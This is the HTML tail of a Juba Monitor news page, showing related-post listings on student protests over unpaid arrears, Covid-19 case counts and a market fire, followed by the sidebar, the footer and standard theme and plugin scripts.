class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/students-continue-to-protest-over-unpaid-arrears/" rel="bookmark" title="Students continue to protest over unpaid arrears">Students continue to protest over unpaid arrears</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' /><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-02-24T06:38:29+00:00">24/02/2021</time><time class="updated" datetime="2021-02-23T20:42:40+03:00">23/02/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By Bullen Bala Alexander South Sudanese students who graduated in Zimbabwe from 2018 to 2021 have threatened to continue with...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fstudents-continue-to-protest-over-unpaid-arrears%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=Students+continue+to+protest+over+unpaid+arrears&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fstudents-continue-to-protest-over-unpaid-arrears%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Fstudents-continue-to-protest-over-unpaid-arrears%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fstudents-continue-to-protest-over-unpaid-arrears%2F&amp;title=Students+continue+to+protest+over+unpaid+arrears" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=Students+continue+to+protest+over+unpaid+arrears&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Fstudents-continue-to-protest-over-unpaid-arrears%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--><div class="post-outer"><article class="post-wrap post-list-1 clearfix"><div class="post-list-inner"><div class="col-sm-6 col-left"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/covid-19-cases-soar-to-over-7000/" title="Covid-19 cases soar to over 7,000" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="365" height="328" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/Medics-in-their-protective-gears-at-the-Ministry-of-Health-365x328.jpg" class="attachment-bingo_ruby_crop_365x330 size-bingo_ruby_crop_365x330 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div></div><div class="col-sm-6 col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/covid-19-cases-soar-to-over-7000/" rel="bookmark" title="Covid-19 cases soar to over 7,000">Covid-19 cases soar to over 7,000</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' /><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-02-24T06:38:26+00:00">24/02/2021</time><time class="updated" datetime="2021-02-23T20:43:01+03:00">23/02/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By James Atem Kuir Covid-19 cases have soared to 7,098 after 167 fresh cases were registered past 48 hours according...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fcovid-19-cases-soar-to-over-7000%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=Covid-19+cases+soar+to+over+7%2C000&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fcovid-19-cases-soar-to-over-7000%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Fcovid-19-cases-soar-to-over-7000%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fcovid-19-cases-soar-to-over-7000%2F&amp;title=Covid-19+cases+soar+to+over+7%2C000" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=Covid-19+cases+soar+to+over+7%2C000&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Fcovid-19-cases-soar-to-over-7000%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--><div class="post-outer"><article class="post-wrap post-list-1 clearfix"><div class="post-list-inner"><div class="col-sm-6 col-left"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/fire-razes-down-goods-worth-over-200000-dollars/" title="Fire razes down goods worth over 200,000 dollars" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="365" height="330" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/The-fire-in-Jebel-Market-rumbles-365x330.jpg" class="attachment-bingo_ruby_crop_365x330 size-bingo_ruby_crop_365x330 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div></div><div class="col-sm-6 col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/fire-razes-down-goods-worth-over-200000-dollars/" rel="bookmark" title="Fire razes down goods worth over 200,000 dollars">Fire razes down goods worth over 200,000 dollars</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' /><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-02-24T06:37:37+00:00">24/02/2021</time><time class="updated" datetime="2021-02-23T20:38:12+03:00">23/02/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By John Agok About ten shops have been razed down by a blaze triggered by suspected firebombers in Jebel Market...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Ffire-razes-down-goods-worth-over-200000-dollars%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=Fire+razes+down+goods+worth+over+200%2C000+dollars&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Ffire-razes-down-goods-worth-over-200000-dollars%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Ffire-razes-down-goods-worth-over-200000-dollars%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Ffire-razes-down-goods-worth-over-200000-dollars%2F&amp;title=Fire+razes+down+goods+worth+over+200%2C000+dollars" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=Fire+razes+down+goods+worth+over+200%2C000+dollars&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Ffire-razes-down-goods-worth-over-200000-dollars%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--></div><!--#related content--></div></div><!--#single post box outer --></div><!--#page--><aside class="sidebar-wrap col-sm-4 col-xs-12 clearfix" ><div class="ruby-sidebar-sticky"><div class="sidebar-inner"><section id="text-5" class="widget widget_text"><div class="widget-title block-title"><h3>About us in brief</h3></div>			<div class="textwidget"><p><img src="https://www.jubamonitor.com/wp-content/uploads/2016/07/cropped-front.png"/><br />
The Juba Monitor is an independent newspaper based in South Sudan's capital, Juba.</p>
</div>
		</section><section id="bingo_ruby_sb_social_counter_widget-2" class="widget sb-widget sb-widget-social-counter"><div class="widget-title block-title"><h3>stay connected</h3></div>
		<div class="widget-content-wrap">
			<div class="sb-social-counter social-counter-wrap style-1">

				                    <div class="counter-element bg-facebook">
                        <a target="_blank" href="http://facebook.com/TheJubaMonitor" class="facebook" title="facebook">
							<span class="counter-element-inner">
								<i class="fa fa-facebook-square"></i>
								<span class="num-count">0</span>
								<span class="text-count">fans</span>
							</span>
                                                    </a>
                    </div><!--facebook like count -->
                					<div class="counter-element bg-twitter">
						<a target="_blank" href="http://twitter.com/JubaMonitor" class="twitter" title="twitter">
							<span class="counter-element-inner">
								<i class="fa fa-twitter"></i>
								<span class="num-count">0</span>
								<span class="text-count">followers</span>
							</span>
													</a>
					</div><!--twitter follower count -->
				
			</div><!-- #social count wrap -->
		</div><!-- #widget content wrap -->

		</section><section id="bingo_ruby_fanpage_widget-4" class="widget sb-widget sb-widget-fb"><div class="widget-title block-title"><h3>Find us on Facebook</h3></div>
			<div class="widget-content-wrap">
				<div class="fb-container">
					<div id="fb-root"></div>
					<script>(function(d, s, id) {
							var js, fjs = d.getElementsByTagName(s)[0];
							if (d.getElementById(id)) return;
							js = d.createElement(s); js.id = id;
							js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3&appId=1385724821660962";
							fjs.parentNode.insertBefore(js, fjs);
						}(document, 'script', 'facebook-jssdk'));</script>
					<div class="fb-page" data-href="http://facebook.com/TheJubaMonitor" data-hide-cover="false" data-show-facepile="true" data-show-posts="false"></div>
				</div>
			</div>

			</section><section id="bingo_ruby_sb_widget_post-2" class="widget sb-widget sb-widget-post"><div class="widget-title block-title"><h3>latest posts</h3></div><div class="widget-content-wrap"><div class="post-widget-inner style-6"><div class="is-top-row"><article class="post-wrap post-overlay-4"><div class="post-thumb-outer post-no-thumb"></div><div class="post-header-outer is-header-overlay is-absolute is-light-text"><div class="post-header"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/refugees-to-benefit-from-business-grant/" rel="bookmark" title="Refugees to benefit from business grant">Refugees to benefit from business grant</a></h2><!--#post title--></div><!--#post header--></div></article></div><div class="post-outer"><article class="post-wrap post-list-4 clearfix"><div class="post-body"><h2 class="post-title entry-title is-size-6"><a class="post-title-link" href="https://www.jubamonitor.com/protection-un-peacekeepers-seek-asylum/" rel="bookmark" title="PROTECTION-UN peacekeepers seek asylum">PROTECTION-UN peacekeepers seek asylum</a></h2><!--#post title--><div class="post-meta-info post-meta-s"><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-02-24T06:39:40+00:00">24/02/2021</time><time class="updated" datetime="2021-02-23T20:43:33+03:00">23/02/2021</time></span><!--#meta info date--></div></div></article></div><div class="post-outer"><article class="post-wrap post-list-4 clearfix"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/students-continue-to-protest-over-unpaid-arrears/" title="Students continue to protest over unpaid arrears" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="110" height="85" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/South-Sudanese-students-who-graduated-while-in-Zimbabwe-110x85.jpg" class="attachment-bingo_ruby_crop_110x85 size-bingo_ruby_crop_110x85 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div><div class="post-body"><h2 class="post-title entry-title is-size-6"><a class="post-title-link" href="https://www.jubamonitor.com/students-continue-to-protest-over-unpaid-arrears/" rel="bookmark" title="Students continue to protest over unpaid arrears">Students continue to protest over unpaid arrears</a></h2><!--#post title--><div class="post-meta-info post-meta-s"><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-02-24T06:38:29+00:00">24/02/2021</time><time class="updated" datetime="2021-02-23T20:42:40+03:00">23/02/2021</time></span><!--#meta info date--></div></div></article></div><div class="post-outer"><article class="post-wrap post-list-4 clearfix"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/covid-19-cases-soar-to-over-7000/" title="Covid-19 cases soar to over 7,000" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="110" height="85" src="https://www.jubamonitor.com/wp-content/uploads/2021/02/Medics-in-their-protective-gears-at-the-Ministry-of-Health-110x85.jpg" class="attachment-bingo_ruby_crop_110x85 size-bingo_ruby_crop_110x85 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div><div class="post-body"><h2 class="post-title entry-title is-size-6"><a class="post-title-link" href="https://www.jubamonitor.com/covid-19-cases-soar-to-over-7000/" rel="bookmark" title="Covid-19 cases soar to over 7,000">Covid-19 cases soar to over 7,000</a></h2><!--#post title--><div class="post-meta-info post-meta-s"><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-02-24T06:38:26+00:00">24/02/2021</time><time class="updated" datetime="2021-02-23T20:43:01+03:00">23/02/2021</time></span><!--#meta info date--></div></div></article></div></div><!--#post widget inner --></div><!--#post widget content wrap --></section></div></div></aside></div><!--#page content--></article><!--#single post--></div></div>

		<footer id="footer" class="footer-wrap" >
						<div class="footer-inner is-light-text">
							<div class="column-footer-wrap">
				<div class="ruby-container row">
					<div class="column-footer-inner">
						<div class="sidebar-footer col-sm-4 col-xs-12" role="complementary">
							<section id="flexible-recent-posts-widget-5" class="widget widget_flexible-recent-posts-widget"><div class="frp-widget-wrapper frp-widget-">
	<div class="widget-title block-title"><h3>RECENT POSTS</h3></div>    <div class="frp-clear"></div>
    <ul class="frp-widget">
		        <li class="frp-news">
			<div class="frp-left">
	<a href="https://www.jubamonitor.com/refugees-to-benefit-from-business-grant/"></a>
</div>
<div class="news-widget-info">
<div class="news-widget-title">
		<a href="https://www.jubamonitor.com/refugees-to-benefit-from-business-grant/" class="news-widget-link">Refugees to benefit from business grant</a>
	</div>
<div class="news-widget-elapsed">2 hours ago</div>
</div>
<div class="frp-clear"></div>
        </li>
		    </ul>
	    <div class="frp-all-category-news frp-all-category-news-footer"><a
            href="https://www.jubamonitor.com/category/weekly-state-news/">All news &gt;&gt;</a></div>
	</div>
</section>						</div>
						<div class="sidebar-footer col-sm-4 col-xs-12" role="complementary">
							<section id="bingo_ruby_sb_social_counter_widget-4" class="widget sb-widget sb-widget-social-counter"><div class="widget-title block-title"><h3>stay connected</h3></div>
		<div class="widget-content-wrap">
			<div class="sb-social-counter social-counter-wrap style-1">

				                    <div class="counter-element bg-facebook">
                        <a target="_blank" href="http://facebook.com/TheJubaMonitor" class="facebook" title="facebook">
							<span class="counter-element-inner">
								<i class="fa fa-facebook-square"></i>
								<span class="num-count">0</span>
								<span class="text-count">fans</span>
							</span>
                                                    </a>
                    </div><!--facebook like count -->
                					<div class="counter-element bg-twitter">
						<a target="_blank" href="http://twitter.com/JubaMonitor" class="twitter" title="twitter">
							<span class="counter-element-inner">
								<i class="fa fa-twitter"></i>
								<span class="num-count">0</span>
								<span class="text-count">followers</span>
							</span>
													</a>
					</div><!--twitter follower count -->
				
			</div><!-- #social count wrap -->
		</div><!-- #widget content wrap -->

		</section>						</div>
						<div class="sidebar-footer col-sm-4 col-xs-12" role="complementary">
							<section id="bingo_ruby_fanpage_widget-3" class="widget sb-widget sb-widget-fb"><div class="widget-title block-title"><h3>Find us on Facebook</h3></div>
			<div class="widget-content-wrap">
				<div class="fb-container">
					<div id="fb-root"></div>
					<script>(function(d, s, id) {
							var js, fjs = d.getElementsByTagName(s)[0];
							if (d.getElementById(id)) return;
							js = d.createElement(s); js.id = id;
							js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3&appId=1385724821660962";
							fjs.parentNode.insertBefore(js, fjs);
						}(document, 'script', 'facebook-jssdk'));</script>
					<div class="fb-page" data-href="http://facebook.com/TheJubaMonitor" data-hide-cover="false" data-show-facepile="true" data-show-posts="false"></div>
				</div>
			</div>

			</section>						</div>
					</div>
				</div>
			</div><!--#footer columns-->
							
					<div class="bottom-footer-wrap">
				<div class="ruby-container">
											<div class="bottom-footer-inner">
															<div class="footer-logo">
									<a href="https://www.jubamonitor.com/" class="logo"
									   title="Juba Monitor">
										<img data-no-retina
										     src="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorLOGO.jpg"
										     height="90"
										     width="300"
										     alt="Juba Monitor">
									</a>
								</div>
																						<nav id="ruby-footer-navigation" class="footer-menu-wrap">
									<div class="menu-big-menu-container"><ul id="footer-nav" class="footer-menu-inner"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-9598"><a href="https://www.jubamonitor.com/">HOME</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-9582 is-category-23"><a href="https://www.jubamonitor.com/category/news-2/">News</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9584 is-category-5"><a href="https://www.jubamonitor.com/category/opinion/">Opinion</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9586 is-category-3"><a href="https://www.jubamonitor.com/category/cover-story/">Cover Story</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9587 is-category-10"><a href="https://www.jubamonitor.com/category/sports/">Sports</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9589 is-category-27"><a href="https://www.jubamonitor.com/category/business/">Business</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11765 is-category-61"><a href="https://www.jubamonitor.com/category/agriculture/agriculture-agriculture/">AGRICULTURE</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9590 is-category-33"><a href="https://www.jubamonitor.com/category/education/">Education</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9588 is-category-9"><a href="https://www.jubamonitor.com/category/entertainment/">Entertainment</a></li>
</ul></div>								</nav>
																				</div>
									</div>
									<div id="footer-copyright" class="footer-copyright-wrap">
						<p>Copyright © 2021 Juba Monitor. All Rights Reserved | Site Managed By: Henry Albert.</p>
					</div>
							</div>
						</div>
		</footer><!--#footer -->
	</div>
</div>
	<div id="wpcp-error-message" class="msgmsg-box-wpcp warning-wpcp hideme"><span>error: </span>Content is protected !!</div>
	<script>
	var timeout_result;
	function show_wpcp_message(smessage)
	{
		if (smessage !== "")
			{
			var smessage_text = '<span>Alert: </span>'+smessage;
			document.getElementById("wpcp-error-message").innerHTML = smessage_text;
			document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp showme";
			clearTimeout(timeout_result);
			timeout_result = setTimeout(hide_message, 3000);
			}
	}
	function hide_message()
	{
		document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp hideme";
	}
	</script>
		<style>
	@media print {
	body * { display: none !important;}
		body:after {
		content: "You are not allowed to print preview this page, Thank you"; }
	}
	</style>
		<style type="text/css">
	#wpcp-error-message {
	    direction: ltr;
	    text-align: center;
	    transition: opacity 900ms ease 0s;
	    z-index: 99999999;
	}
	.hideme {
    	opacity:0;
    	visibility: hidden;
	}
	.showme {
    	opacity:1;
    	visibility: visible;
	}
	.msgmsg-box-wpcp {
		border-radius: 10px;
		color: #555;
		font-family: Tahoma;
		font-size: 11px;
		margin: 10px;
		padding: 10px 36px;
		position: fixed;
		width: 255px;
		top: 50%;
  		left: 50%;
  		margin-top: -10px;
  		margin-left: -130px;
  		-webkit-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1);
		-moz-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1);
		box-shadow: 0px 0px 34px 2px rgba(242,191,191,1);
	}
	.msgmsg-box-wpcp span {
		font-weight:bold;
		text-transform:uppercase;
	}
	.error-wpcp {		background:#ffecec url('https://www.jubamonitor.com/wp-content/plugins/wp-content-copy-protector/images/error.png') no-repeat 10px 50%;
		border:1px solid #f5aca6;
	}
	.success {
		background:#e9ffd9 url('https://www.jubamonitor.com/wp-content/plugins/wp-content-copy-protector/images/success.png') no-repeat 10px 50%;
		border:1px solid #a6ca8a;
	}
	.warning-wpcp {
		background:#ffecec url('https://www.jubamonitor.com/wp-content/plugins/wp-content-copy-protector/images/warning.png') no-repeat 10px 50%;
		border:1px solid #f5aca6;
	}
	.notice {
		background:#e3f7fc url('https://www.jubamonitor.com/wp-content/plugins/wp-content-copy-protector/images/notice.png') no-repeat 10px 50%;
		border:1px solid #8ed9f6;
	}
    </style>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/auto-image-alt/js/auto_image_alt.js?ver=1.1'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/bingo-ruby-core/assets/script.js?ver=1.6'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/www.jubamonitor.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.4'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-modernizr.js?ver=v2.8.3'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-totop.js?ver=v1.2'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-waypoints.js?ver=v3.1.1'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-slick.js?ver=v1.5.8'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-tipsy.js?ver=v1.0'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-magnificpopup.js?ver=v1.1.0'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-justified.js?ver=v1.1.0'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-backstretch.js?ver=v2.0.4'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-smoothscroll.js?ver=v1.2.1'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-bootstrap.js?ver=v3.0'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-fitvids.js?ver=v1.1'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-sticky.js?ver=v1.0.3'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-rubysticky.js?ver=1.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var bingo_ruby_to_top = "1";
var bingo_ruby_social_tooltip = "1";
var bingo_ruby_single_image_popup = "1";
/* ]]> */
</script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/js/theme-script.js?ver=2.4'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/wp-embed.min.js?ver=5.1.8'></script>
</body>
</html>
<!-- Dynamic page generated in 0.224 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2021-02-24 20:40:40 -->

<!-- super cache -->